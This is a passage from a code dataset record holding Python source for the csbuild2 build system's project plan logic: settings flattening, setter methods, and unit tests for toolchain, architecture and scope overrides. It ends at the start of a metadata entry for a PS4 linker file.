self.name, toolchainName)\n\t\t\t\treturn None\n\n\t\t\tplatforms = self.selfLimits[\"platform\"]\n\t\t\tif platforms and platform.system() not in platforms:\n\t\t\t\tlog.Info(\"Project {} does not support platform {}\", self.name, platform.system())\n\t\t\t\treturn None\n\n\t\t\tarchitectures = self.selfLimits[\"architecture\"]\n\t\t\tif architectures and architectureName not in architectures:\n\t\t\t\tlog.Info(\"Project {} does not support architecture {}\", self.name, architectureName)\n\t\t\t\treturn None\n\n\t\t\ttargets = self.selfLimits[\"target\"]\n\t\t\tif targets and targetName not in targets:\n\t\t\t\tlog.Info(\"Project {} does not support target {}\", self.name, targetName)\n\t\t\t\treturn None\n\n\t\t\tif targetName not in self.knownTargets:\n\t\t\t\tlog.Info(\"Project {} does not know about target {}\", self.name, targetName)\n\t\t\t\treturn None\n\n\t\twith perf_timer.PerfTimer(\"Flattening settings\"):\n\t\t\tprojectType = self._settings.get(\"projectType\", ProjectType.Application)\n\t\t\tprojectType = self._getFinalValue(self._settings.get(\"overrides\"), \"projectType\", toolchainName, architectureName, targetName, projectType)\n\n\t\t\tsettings = {}\n\t\t\tfor key, value in self._settings.items():\n\t\t\t\tif key == \"overrides\":\n\t\t\t\t\tcontinue\n\t\t\t\tsettings[key] = copy.deepcopy(value)\n\n\t\t\tflattenedDepends = ordered_set.OrderedSet()\n\t\t\tself._flattenDepends(flattenedDepends, self)\n\n\t\t\tlibraries = ordered_set.OrderedSet()\n\t\t\tif \"libraries\" in settings:\n\t\t\t\tlibraries = settings[\"libraries\"]\n\t\t\t\tdel settings[\"libraries\"]\n\n\t\t\tself._flattenOverrides(\n\t\t\t\tsettings,\n\t\t\t\tself._settings.get(\"overrides\", {}),\n\t\t\t\ttoolchainName,\n\t\t\t\tarchitectureName,\n\t\t\t\ttargetName,\n\t\t\t\t\"all\"\n\t\t\t)\n\n\t\t\tfor depend in flattenedDepends:\n\t\t\t\t# pylint: disable=protected-access\n\t\t\t\tdependObj = allPlans[depend] # type: ProjectPlan\n\n\t\t\t\tif projectType == ProjectType.Application:\n\t\t\t\t\tsettings[\"libraries\"] = 
ordered_set.OrderedSet(settings.get(\"libraries\")) | ordered_set.OrderedSet(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\tdependObj._getFinalValue(\n\t\t\t\t\t\t\t\tdependObj._settings.get(\"overrides\"),\n\t\t\t\t\t\t\t\t\"outputName\",\n\t\t\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\t\tdependObj._name\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"all\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"children\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"final\"\n\t\t\t\t\t)\n\t\t\t\telse:\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"all\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"children\"\n\t\t\t\t\t)\n\t\t\t\t\tself._flattenOverrides(\n\t\t\t\t\t\tsettings,\n\t\t\t\t\t\tdependObj._settings.get(\"overrides\", {}),\n\t\t\t\t\t\ttoolchainName,\n\t\t\t\t\t\tarchitectureName,\n\t\t\t\t\t\ttargetName,\n\t\t\t\t\t\t\"scope\"\n\t\t\t\t\t)\n\n\t\t\tif \"libraries\" in settings:\n\t\t\t\tsettings[\"libraries\"] |= libraries\n\t\t\telse:\n\t\t\t\tsettings[\"libraries\"] = libraries\n\n\t\t\tself._flattenOverrides(settings, self._settings.get(\"overrides\"), toolchainName, architectureName, targetName)\n\n\t\t\ttools = settings.get(\"tools\", set()) - settings.get(\"disabledTools\", set())\n\t\t\tfor tool in tools:\n\t\t\t\tif tool.supportedArchitectures is not None and architectureName not in tool.supportedArchitectures:\n\t\t\t\t\tlog.Info(\"Tool {} does not support architecture {}\", tool.__name__, architectureName)\n\t\t\t\t\treturn None\n\t\t\t\tif tool.supportedPlatforms is not None and platform.system() not in tool.supportedPlatforms:\n\t\t\t\t\tlog.Info(\"Tool {} does not support platform {}\", tool.__name__, platform.system())\n\t\t\t\t\treturn None\n\n\t\treturn project.Project(\n\t\t\tself._name,\n\t\t\tself._workingDirectory,\n\t\t\tflattenedDepends,\n\t\t\tself._priority,\n\t\t\tself._ignoreDependencyOrdering,\n\t\t\tself._autoDiscoverSourceFiles,\n\t\t\tself._autoResolveRpaths,\n\t\t\tsettings,\n\t\t\ttoolchainName,\n\t\t\tarchitectureName,\n\t\t\ttargetName,\n\t\t\tself._scriptDir\n\t\t)\n\n\n\t@TypeChecked(key=String, value=object)\n\tdef SetValue(self, key, value):\n\t\t\"\"\"\n\t\tSet a value in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings[key] = value\n\n\t@TypeChecked(key=String)\n\tdef Unset(self, key):\n\t\t\"\"\"\n\t\tRemove a value from the project
settings\n\n\t:param key: The setting key\n\t:type key: str, bytes\n\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tdel settings[key]\n\n\t@TypeChecked(key=String, value=object)\n\tdef ExtendList(self, key, value):\n\t\t\"\"\"\n\t\tExtend a list in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, []).extend(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef AppendList(self, key, value):\n\t\t\"\"\"\n\t\tAppend to a list in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, []).append(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef UpdateDict(self, key, value):\n\t\t\"\"\"\n\t\tUpdate a dict in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The key/value pair to add to the named dict\n\t\t:type value: dict\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, {}).update(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef UnionSet(self, key, value):\n\t\t\"\"\"\n\t\tCombine two sets in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, ordered_set.OrderedSet()).update(value)\n\n\t@TypeChecked(key=String, value=object)\n\tdef AddToSet(self, key, value):\n\t\t\"\"\"\n\t\tAdd to a set in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:param value: The value\n\t\t:type value: Any\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings.setdefault(key, ordered_set.OrderedSet()).add(value)\n\n\t@TypeChecked(key=String)\n\tdef HasValue(self, key):\n\t\t\"\"\"\n\t\tCheck to see if an override is present in the project settings\n\n\t\t:param key: The setting key\n\t\t:type key: str, bytes\n\t\t:return: Whether or not the value is present\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tif key in self._settings:\n\t\t\treturn True\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tif key in settings:\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef GetTempToolchainsInCurrentContexts(self, *toolchainNames):\n\t\t\"\"\"\n\t\tGet a list of all temporary toolchains in the currently active contexts.\n\t\t:param toolchainNames: The toolchains to look for\n\t\t:type toolchainNames: str, bytes\n\t\t:return: list of temporary toolchains in currently active
contexts\n\t\t:rtype: list\n\t\t\"\"\"\n\t\tret = []\n\t\tfor key in toolchainNames:\n\t\t\ttry:\n\t\t\t\tfor settingsDict in self._workingSettingsStack:\n\t\t\t\t\tfor settings in settingsDict:\n\t\t\t\t\t\toverrideSettings = settings.get(\"overrides\", {}).get(\"toolchain\", {})\n\t\t\t\t\t\tif key in overrideSettings:\n\t\t\t\t\t\t\tif \"_tempToolchain\" in overrideSettings[key]:\n\t\t\t\t\t\t\t\tret.append(overrideSettings[key][\"_tempToolchain\"])\n\t\t\t\t\t\t\t\traise MultiBreak()\n\t\t\texcept MultiBreak:\n\t\t\t\tcontinue\n\t\treturn ret\n\n\t@TypeChecked(key=String, action=Callable)\n\tdef PerformAction(self, key, action):\n\t\t\"\"\"\n\t\tPerform a complex action on values in the settings dictionary.\n\n\t\t:param key: The value to act on\n\t\t:type key: str, bytes\n\t\t:param action: The action to take\n\t\t:type action: A callable accepting a single parameter representing the current value and returning the new value.\n\t\t\tIf the key has not been set for this scope, the current value passed in will be None.\n\t\t\tNote that the value passed in will represent only values in the CURRENT scope, not including\n\t\t\tvalues inherited from parent scopes.\n\n\t\t\tAny type may be stored this way, but if the types are to be merged with values from the parent scope, they\n\t\t\tshould be one of the following types:\n\t\t\t\t- list\n\t\t\t\t- dict\n\t\t\t\t- collections.OrderedDict\n\t\t\t\t- set\n\t\t\t\t- csbuild._utils.ordered_set.OrderedSet\n\t\t\tAny other value will not be merged with values in parent scopes, but will override them.\n\t\t\"\"\"\n\t\tif toolchain.currentToolId is not None:\n\t\t\tkey = \"{}!{}\".format(toolchain.currentToolId[0], key)\n\t\tfor settings in self._currentSettingsDicts:\n\t\t\tsettings[key] = action(settings.setdefault(key, None))\n\n### Unit Tests ###\n\nclass TestProjectPlan(testcase.TestCase):\n\t\"\"\"Test the project plan\"\"\"\n\t# pylint: disable=invalid-name\n\tdef setUp(self):\n\t\tfrom .._utils import shared_globals\n\t\tself._oldVerbosity = shared_globals.verbosity\n\t\t#INFO logging in ExecutePlan is a little noisy for tests, quieting it down for this test and popping it back up later is good.\n\t\tshared_globals.verbosity = shared_globals.Verbosity.Quiet\n\t\tfrom csbuild.toolchain import Tool\n\t\tclass _nullTool(Tool):\n\t\t\tsupportedArchitectures = None\n\t\t\tinputFiles = None\n\t\t\toutputFiles = {\"\"}\n\n\t\t\tdef Run(self, inputProject, inputFile):\n\t\t\t\tpass\n\n\t\tglobal allPlans\n\t\tallPlans = {}\n\t\t# pylint: disable=protected-access\n\t\tcsbuild.currentPlan._settings = {}\n\t\tcsbuild.currentPlan = ProjectPlan(\"\", \"\", [], 0, False, False, False, \"\")\n\n\t\tcsbuild.currentPlan.knownTargets.update({\"target\"})\n\t\tcsbuild.currentPlan.childTargets.update({\"target\"})\n\n\t\t# Create some mocked in toolchains...\n\t\tcsbuild.currentPlan.EnterContext(\n\t\t\t(\n\t\t\t\t\"toolchain\",\n\t\t\t\t(\n\t\t\t\t\t\"tc1\",\n\t\t\t\t\t\"tc2\",\n\t\t\t\t\t\"none\",\n\t\t\t\t\t\"scope-then-toolchain\",\n\t\t\t\t\t\"toolchain-then-scope\",\n\t\t\t\t\t\"no-toolchain\"\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\t\tcsbuild.currentPlan.SetValue(\"tools\", ordered_set.OrderedSet((_nullTool,)))\n\n\t\tcsbuild.currentPlan.LeaveContext()\n\t\tcsbuild.currentPlan.SetValue(\"projectType\", csbuild.ProjectType.Application)\n\n\t\tself._oldPlan = csbuild.currentPlan\n\n\tdef tearDown(self):\n\t\tfrom .._utils import shared_globals\n\t\tcsbuild.currentPlan = self._oldPlan\n\t\tshared_globals.verbosity = self._oldVerbosity\n\n\n\tdef 
testProjectPlan(self):\n\t\t\"\"\"Ensure all overrides apply properly to the project plan\"\"\"\n\t\tplan = ProjectPlan(\"test\", \"test\", [], 0, False, True, False, \"\")\n\n\t\tplan.SetValue(\"value\", 1)\n\t\tplan.AppendList(\"list\", 2)\n\t\tplan.AddToSet(\"set\", 3)\n\t\tplan.UpdateDict(\"dict\", {4: 5})\n\t\tplan.SetValue(\"hasTarget\", False)\n\n\t\tplan.EnterContext((\"toolchain\", (\"tc1\",)))\n\t\t# pylint: disable=using-constant-test\n\t\t# The constant tests here are just so I can add indents to make the contexts easier to see\n\t\tif True:\n\t\t\tplan.SetValue(\"value\", 6)\n\t\t\tplan.AppendList(\"list\", 7)\n\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\tplan.AddToSet(\"set\", 8)\n\t\t\tplan.UpdateDict(\"dict\", {9: 10})\n\t\t\tplan.UpdateDict(\"dict\", {4: 11})\n\n\t\t\tplan.EnterContext((\"architecture\", (\"ar1\",)))\n\t\t\tif True:\n\t\t\t\tplan.SetValue(\"value\", 12)\n\t\t\t\tplan.AppendList(\"list\", 13)\n\t\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\t\tplan.AddToSet(\"set\", 14)\n\t\t\t\tplan.UpdateDict(\"dict\", {15: 16})\n\t\t\t\tplan.UpdateDict(\"dict\", {4: 17})\n\n\t\t\tplan.LeaveContext()\n\n\t\t\tplan.EnterContext((\"architecture\", (\"ar2\",)))\n\t\t\tif True:\n\t\t\t\tplan.SetValue(\"value\", 18)\n\t\t\t\tplan.AppendList(\"list\", 19)\n\t\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\t\tplan.AddToSet(\"set\", 20)\n\t\t\t\tplan.UpdateDict(\"dict\", {21: 22})\n\t\t\t\tplan.UpdateDict(\"dict\", {4: 23})\n\n\t\t\t\tplan.LeaveContext()\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"architecture\", (\"ar2\",)))\n\t\tif True:\n\t\t\tplan.AppendList(\"list\", 24)\n\t\t\tplan.AddToSet(\"set\", 25)\n\t\t\tplan.UpdateDict(\"dict\", {26: 27})\n\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"architecture\", (\"ar3\",)))\n\t\tif True:\n\n\t\t\tplan.SetValue(\"value\", 28)\n\t\t\tplan.AppendList(\"list\", 29)\n\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\tplan.AddToSet(\"set\", 30)\n\t\t\tplan.UpdateDict(\"dict\", {31: 32})\n\t\t\tplan.UpdateDict(\"dict\", {4: 33})\n\n\t\t\tplan.EnterContext((\"toolchain\", (\"tc2\",)))\n\t\t\tif True:\n\t\t\t\tplan.SetValue(\"value\", 34)\n\t\t\t\tplan.AppendList(\"list\", 35)\n\t\t\t\tplan.AddToSet(\"set\", 3)\n\t\t\t\tplan.AddToSet(\"set\", 36)\n\t\t\t\tplan.UpdateDict(\"dict\", {37: 38})\n\t\t\t\tplan.UpdateDict(\"dict\", {4: 39})\n\n\t\t\t\tplan.LeaveContext()\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"toolchain\", (\"tc2\",)))\n\t\tif True:\n\t\t\tplan.AppendList(\"list\", 40)\n\t\t\tplan.AddToSet(\"set\", 41)\n\t\t\tplan.UpdateDict(\"dict\", {42: 43})\n\n\t\t\tplan.LeaveContext()\n\n\t\tplan.EnterContext((\"target\", (\"target\",)))\n\t\tif True:\n\t\t\tplan.SetValue(\"hasTarget\", True)\n\n\t\t\tplan.LeaveContext()\n\n\t\tproj1 = plan.ExecutePlan(\"tc1\", \"ar1\", \"target\")\n\t\tproj2 = plan.ExecutePlan(\"tc1\", \"ar2\", \"target\")\n\t\tproj3 = plan.ExecutePlan(\"tc1\", \"ar3\", \"target\")\n\t\tproj4 = plan.ExecutePlan(\"tc2\", \"ar1\", \"target\")\n\t\tproj5 = plan.ExecutePlan(\"tc2\", \"ar2\", \"target\")\n\t\tproj6 = plan.ExecutePlan(\"tc2\", \"ar3\", \"target\")\n\n\t\tself.assertIn(\"value\", proj1.settings)\n\t\tself.assertIn(\"list\", proj1.settings)\n\t\tself.assertIn(\"set\", proj1.settings)\n\t\tself.assertIn(\"dict\", proj1.settings)\n\n\t\tself.assertIn(\"value\", proj2.settings)\n\t\tself.assertIn(\"list\", proj2.settings)\n\t\tself.assertIn(\"set\", proj2.settings)\n\t\tself.assertIn(\"dict\", proj2.settings)\n\n\t\tself.assertIn(\"value\", proj3.settings)\n\t\tself.assertIn(\"list\", 
proj3.settings)\n\t\tself.assertIn(\"set\", proj3.settings)\n\t\tself.assertIn(\"dict\", proj3.settings)\n\n\t\tself.assertIn(\"value\", proj4.settings)\n\t\tself.assertIn(\"list\", proj4.settings)\n\t\tself.assertIn(\"set\", proj4.settings)\n\t\tself.assertIn(\"dict\", proj4.settings)\n\n\t\tself.assertIn(\"value\", proj5.settings)\n\t\tself.assertIn(\"list\", proj5.settings)\n\t\tself.assertIn(\"set\", proj5.settings)\n\t\tself.assertIn(\"dict\", proj5.settings)\n\n\t\tself.assertIn(\"value\", proj6.settings)\n\t\tself.assertIn(\"list\", proj6.settings)\n\t\tself.assertIn(\"set\", proj6.settings)\n\t\tself.assertIn(\"dict\", proj6.settings)\n\n\t\tdef _assertListOrSetMembers(listToCheck, *args):\n\t\t\tself.assertEqual(len(listToCheck), len(args))\n\t\t\tlistToCheck = list(listToCheck)\n\t\t\tfor i, arg in enumerate(args):\n\t\t\t\tself.assertEqual(arg, listToCheck[i])\n\n\t\t_assertListOrSetMembers(proj1.settings[\"list\"], 2, 7, 13)\n\t\t_assertListOrSetMembers(proj2.settings[\"list\"], 2, 7, 19, 24)\n\t\t_assertListOrSetMembers(proj3.settings[\"list\"], 2, 7, 29)\n\t\t_assertListOrSetMembers(proj4.settings[\"list\"], 2, 40)\n\t\t_assertListOrSetMembers(proj5.settings[\"list\"], 2, 40, 24)\n\t\t_assertListOrSetMembers(proj6.settings[\"list\"], 2, 40, 29, 35)\n\n\t\t_assertListOrSetMembers(proj1.settings[\"set\"], 3, 8, 14)\n\t\t_assertListOrSetMembers(proj2.settings[\"set\"], 3, 8, 20, 25)\n\t\t_assertListOrSetMembers(proj3.settings[\"set\"], 3, 8, 30)\n\t\t_assertListOrSetMembers(proj4.settings[\"set\"], 3, 41)\n\t\t_assertListOrSetMembers(proj5.settings[\"set\"], 3, 41, 25)\n\t\t_assertListOrSetMembers(proj6.settings[\"set\"], 3, 41, 30, 36)\n\n\t\tdef _assertDictMembers(dictToCheck, *args):\n\t\t\tself.assertEqual(len(dictToCheck), len(args))\n\t\t\tfor key, val in args:\n\t\t\t\tself.assertEqual(val, dictToCheck[key])\n\n\t\t_assertDictMembers(proj1.settings[\"dict\"], (9, 10), (15, 16), (4, 17))\n\t\t_assertDictMembers(proj2.settings[\"dict\"], (9, 10), (26, 27), (21, 22), (4, 23))\n\t\t_assertDictMembers(proj3.settings[\"dict\"], (9, 10), (31, 32), (4, 33))\n\t\t_assertDictMembers(proj4.settings[\"dict\"], (4, 5), (42, 43))\n\t\t_assertDictMembers(proj5.settings[\"dict\"], (4, 5), (26, 27), (42, 43))\n\t\t_assertDictMembers(proj6.settings[\"dict\"], (31, 32), (37, 38), (4, 39), (42, 43))\n\n\n\t\tself.assertEqual(proj1.settings[\"value\"], 12)\n\t\tself.assertEqual(proj2.settings[\"value\"], 18)\n\t\tself.assertEqual(proj3.settings[\"value\"], 28)\n\t\tself.assertEqual(proj4.settings[\"value\"], 1)\n\t\tself.assertEqual(proj5.settings[\"value\"], 1)\n\t\tself.assertEqual(proj6.settings[\"value\"], 34)\n\n\t\tself.assertTrue(proj1.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj2.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj3.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj4.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj5.settings[\"hasTarget\"])\n\t\tself.assertTrue(proj6.settings[\"hasTarget\"])\n\n\tdef testScope(self):\n\t\t\"\"\"Ensure all scope overrides apply properly to dependent project plans\"\"\"\n\t\tfrom .. 
import ProjectType\n\n\t\tfirst = ProjectPlan(\"first\", \"test\", [], 0, False, True, False, \"\")\n\t\tsecond = ProjectPlan(\"second\", \"test\", [\"first\"], 0, False, True, False, \"\")\n\t\tthird = ProjectPlan(\"third\", \"test\", [\"second\"], 0, False, True, False, \"\")\n\n\t\tfirst.SetValue(\"projectType\", ProjectType.StaticLibrary)\n\t\tsecond.SetValue(\"projectType\", ProjectType.StaticLibrary)\n\t\tthird.SetValue(\"projectType\", ProjectType.Application)\n\n\t\tthird.AddToSet(\"libraries\", \"lib1\")\n\n\t\tfirst.EnterContext((\"scope\", (\"final\",)))\n\t\t# pylint: disable=using-constant-test\n\t\t# The constant tests here are just so I can add indents to make the contexts easier to see\n\t\tif True:\n\t\t\tfirst.AddToSet(\"libraries\", \"lib2\")\n\t\t\tfirst.SetValue(\"should_be_one\", 2)\n\t\t\tfirst.AddToSet(\"someSet\", \"final\")\n\t\t\tfirst.EnterContext((\"toolchain\", (\"scope-then-toolchain\",)))\n\t\t\tif True:\n\t\t\t\tfirst.AddToSet(\"otherSet\", \"final\")\n\t\t\t\tfirst.AddToSet(\"libraries\", \"lib3\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tfirst.LeaveContext()\n\n\t\tfirst.EnterContext((\"scope\", (\"intermediate\",)))\n\t\tif True:\n\t\t\tfirst.AddToSet(\"someSet\", \"intermediate\")\n\t\t\tfirst.EnterContext((\"toolchain\", (\"scope-then-toolchain\",)))\n\t\t\tif True:\n\t\t\t\tfirst.AddToSet(\"otherSet\", \"intermediate\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tfirst.LeaveContext()\n\n\t\tfirst.EnterContext((\"toolchain\", (\"toolchain-then-scope\",)))\n\t\tif True:\n\t\t\tfirst.EnterContext((\"scope\", (\"final\",)))\n\t\t\tif True:\n\t\t\t\tfirst.AddToSet(\"thirdSet\", \"final\")\n\t\t\t\tfirst.AddToSet(\"libraries\", \"lib4\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tif True:\n\t\t\t\tfirst.EnterContext((\"scope\", (\"intermediate\",)))\n\t\t\t\tfirst.AddToSet(\"thirdSet\", \"intermediate\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tfirst.LeaveContext()\n\n\t\tsecond.EnterContext((\"scope\", (\"final\",)))\n\t\tif True:\n\t\t\tsecond.AddToSet(\"libraries\", \"lib5\")\n\t\t\tsecond.SetValue(\"should_be_one\", 3)\n\t\t\tsecond.LeaveContext()\n\n\t\tthird.SetValue(\"should_be_one\", 1)\n\t\tthird.AddToSet(\"libraries\", \"lib6\")\n\n\t\tfirst1 = first.ExecutePlan(\"scope-then-toolchain\", \"none\", \"target\")\n\t\tfirst2 = first.ExecutePlan(\"toolchain-then-scope\", \"none\", \"target\")\n\t\tfirst3 = first.ExecutePlan(\"no-toolchain\", \"none\", \"target\")\n\t\tsecond1 = second.ExecutePlan(\"scope-then-toolchain\", \"none\", \"target\")\n\t\tsecond2 = second.ExecutePlan(\"toolchain-then-scope\", \"none\", \"target\")\n\t\tsecond3 = second.ExecutePlan(\"no-toolchain\", \"none\", \"target\")\n\t\tthird1 = third.ExecutePlan(\"scope-then-toolchain\", \"none\", \"target\")\n\t\tthird2 = third.ExecutePlan(\"toolchain-then-scope\", \"none\", \"target\")\n\t\tthird3 = third.ExecutePlan(\"no-toolchain\", \"none\", \"target\")\n\n\t\tself.assertEqual(third1.settings[\"should_be_one\"], 1)\n\t\tself.assertEqual(third2.settings[\"should_be_one\"], 1)\n\t\tself.assertEqual(third3.settings[\"should_be_one\"], 1)\n\n\t\tdef _assertSetMembersInOrder(setToCheck, *args):\n\t\t\tself.assertEqual(len(setToCheck), len(args))\n\t\t\tsetToCheck = list(setToCheck)\n\t\t\tfor i, arg in enumerate(args):\n\t\t\t\tself.assertEqual(arg, 
setToCheck[i])\n\n\t\t_assertSetMembersInOrder(first1.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(first2.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(first3.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(second1.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(second2.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(second3.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(third1.settings[\"libraries\"], \"first\", \"lib2\", \"lib3\", \"second\", \"lib5\", \"lib1\", \"lib6\")\n\t\t_assertSetMembersInOrder(third2.settings[\"libraries\"], \"first\", \"lib4\", \"lib2\", \"second\", \"lib5\", \"lib1\", \"lib6\")\n\t\t_assertSetMembersInOrder(third3.settings[\"libraries\"], \"first\", \"lib2\", \"second\", \"lib5\", \"lib1\", \"lib6\")\n\n\tdef testInheritance(self):\n\t\t\"\"\"Test that project inheritance works correctly\"\"\"\n\t\tcsbuild.currentPlan = ProjectPlan(\"first\", \"test\", [], 0, False, True, False, \"\")\n\t\tcsbuild.currentPlan.AppendList(\"list\", 1)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 2)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 3)\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {1: 2})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {3: 4})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {5: 6})\n\n\t\tfirst = csbuild.currentPlan\n\t\tcsbuild.currentPlan = ProjectPlan(\"second\", \"test\", [\"first\"], 0, False, True, False, \"\")\n\t\tcsbuild.currentPlan.AppendList(\"list\", 4)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 5)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 6)\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {7: 8})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {9: 10})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {11: 12})\n\t\tsecond = csbuild.currentPlan\n\n\n\t\tfirst1 = first.ExecutePlan(\"none\", \"none\", \"target\")\n\t\tsecond1 = second.ExecutePlan(\"none\", \"none\", \"target\")\n\n\t\tself.assertEqual(first1.settings[\"list\"], [1,2,3])\n\t\tself.assertEqual(second1.settings[\"list\"], [1,2,3,4,5,6])\n\t\tself.assertEqual(first1.settings[\"dict\"], {1:2,3:4,5:6})\n\t\tself.assertEqual(second1.settings[\"dict\"], {1:2,3:4,5:6,7:8,9:10,11:12})\n\n\tdef testMultiNameContext(self):\n\t\t\"\"\"Test that entering multiple contexts simultaneously works\"\"\"\n\t\tfirst = ProjectPlan(\"first\", \"test\", [], 0, False, True, False, \"\")\n\t\tfirst.SetValue(\"a\", 1)\n\t\tfirst.EnterContext((\"toolchain\", (\"tc1\", \"tc2\")))\n\t\tfirst.SetValue(\"a\", 2)\n\t\tfirst.LeaveContext()\n\n\t\tfirst1 = first.ExecutePlan(\"none\", \"none\", \"target\")\n\t\tfirst2 = first.ExecutePlan(\"tc1\", \"none\", \"target\")\n\t\tfirst3 = first.ExecutePlan(\"tc2\", \"none\", \"target\")\n\n\t\tself.assertEqual(first1.settings[\"a\"], 1)\n\t\tself.assertEqual(first2.settings[\"a\"], 2)\n\t\tself.assertEqual(first3.settings[\"a\"], 2)\n" }, { "alpha_fraction": 0.6923241019248962, "alphanum_fraction": 0.6963752508163452, "avg_line_length": 34.26315689086914, "blob_id": "dd25260a625e2ac19ff17a4efb33290aff866685", "content_id": "ca89cacef1fe4030b250a13f0e9750b5b70518dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4690, "license_type": "no_license", "max_line_length": 117, "num_lines": 133, "path": "/csbuild/tools/linkers/ps4_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 